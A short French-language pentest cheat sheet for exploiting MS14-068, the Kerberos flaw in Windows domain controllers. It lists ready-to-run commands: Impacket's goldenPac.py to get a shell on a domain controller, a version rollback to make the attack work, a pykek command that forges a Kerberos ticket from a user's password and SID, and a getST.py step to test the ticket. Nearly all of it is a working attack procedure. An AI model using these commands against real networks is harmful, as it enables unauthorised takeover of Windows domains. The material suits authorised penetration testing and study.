MS14-068

Impacket

Avec impacket, il est possible d’obtenir un shell avec la commande suivante:

goldenPac.py  <domain>/<user>@<dc>

DISCLAIMER

La version d’Impacket 0.9.25 semble contenir une régression sur cette attaque. Un “rollback” permet son bon fonctionnement avec les commandes suivantes:

cd /opt/tools/impacket
git checkout impacket_0_9_23
python3 -m pip install .

PyKek

Il est possible d’obtenir un golden ticket à l’aide de pykek:

python2 ms14-068 -u <username>@<dc> -p <password> -s <USER_SID> -d <domain name>
export KRB5CCNAME=<ccache file>

Il est possible de récupérer le USER_SID à l’aide de RPCClient

Il est ensuite possible de tester le ticket auprès d’un service:

getST.py -k -no-pass -spn 'any_valid_spn' <domain name>/<username>